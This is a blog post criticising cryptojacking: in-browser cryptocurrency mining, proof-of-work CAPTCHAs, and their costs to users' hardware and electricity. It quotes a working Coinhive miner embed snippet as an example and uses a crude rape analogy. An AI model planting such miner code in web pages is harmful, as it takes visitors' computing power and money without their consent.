Cryptojacking: cryptography in the service of the Devil
A new revenue stream has been implemented by the end of the last year. Maybe cryptojacking did not get yet the hype it deserves but it has been already widely used. Most Internet consumers are not aware of it though its intentions are far from being innocent. It may also generate inequalities among Internet users.
Cryptojacking is about using the user’s device processor, with or without his consent, to mine cryptocurrency when visiting a given webpage which is not necessarily compromised but can do that on purpose. It starts instantly upon visiting a cryptocurrency mining webpage. In its most nefarious form, cryptojacking does not require permission or any other form of effort from the user to be run. In other words, cryptojacking consists in hijacking the user’s devices (computer, smartphone, tablet …etc) to pilfer digital profit.
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.User('<site-key>', 'john-doe'); miner.start(); </script>
This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running.
Let us know what you think in the comments. Do you want ads or do you want to give away a few of your CPU cycles every time you visit the site? *
Personally, I see such an approach equivalent to when you ask someone the permission to rape him. That said, I remember I read somewhere else that most PirateBay users accepted an in-browser mining to reduce adds. And since that, copycats have been cropping up to claim funds raising or reducing adds. Nefarious attackers can mine digital money for themselves by compromising a given website to take advantage of its traffic3. There is even a Google Chrome extension4 which is removed from the Web Store for mining cryptocurrency in the background without the knowledge and consent of its users.
To prevent spamming activities, website provide a challenge response test in the form of CAPTCHA to be solve by the visitor to check if that is a human or a machine. But nowadays, most probably you have already encountered a website which relies on the proof of work CAPCHA. The concept of POW CAPTCHA5 consists in forcing your CPU to solve a mathematical puzzle in the form of a hashing algorithm for the Monero Blockchain.
This is how POW CAPTCHA looks like:
While this technique makes your surfing easier and flatters your laziness in that you do not need to solve the CAPTCHA manually by yourself, you pay the website by letting it exploit your CPU and raise your electrical bills. Of course, depending on the speed and power of your machine, you may wait more or less than other visitors to be able to surf on the website in question.
Running several cryptojacked webpages may have dramatic consequences emanating from an overwhelmed machine’s processor: that can range from interrupted work to damaging the hardware (as it is the case with the infamous Android trojan called Loapi6) passing by data loss or a glitch in an organization’s network. There is a simpler yet effective impact to frequently land on cryptojacking webpages: that will increase your electric bills as the CPU of your machine is “forced” to work more.
POW CAPTCHA will prevent spamming activities because these later ones are done rather by computer botnet8, so the attacker does not worry about how much CPU power is taken from the machines under his control. On the other hand, cryptojacking compromises the browsing user experience, and maybe one day everybody will have to buy a more expensive computer in order to surf on the Internet, or have to pay more electrical bills to read news online instead of paying for the conventional membership. Definitely, given our nature as humans, cryptojacking may be a source to nourish inequality among Internet consumers.